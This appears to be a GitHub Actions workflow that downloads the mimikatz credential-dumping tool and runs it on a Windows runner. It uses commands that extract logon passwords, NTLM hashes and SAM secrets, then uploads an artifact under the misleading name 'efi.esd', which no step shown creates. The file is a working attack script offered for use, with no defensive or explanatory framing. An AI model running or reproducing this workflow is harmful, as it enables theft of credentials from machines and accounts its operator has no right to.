name: mimi
on:
  workflow_dispatch:

jobs:
  dump:
      runs-on: windows-latest
      steps:
      - uses: actions/checkout@v2
      - name: Build
        run: |
          mkdir .\mimi\
          Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip' -OutFile mimi.zip
          Expand-Archive mimi.zip -DestinationPath .\mimi\
          .\mimi\x64\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
          .\mimi\x64\mimikatz.exe "privilege::debug" "token::whoami" "token::elevate" "lsadump::sam" "sekurlsa::msv" exit

      - uses: actions/upload-artifact@v3
        with:
          name: efi.esd
          path: efi.esd
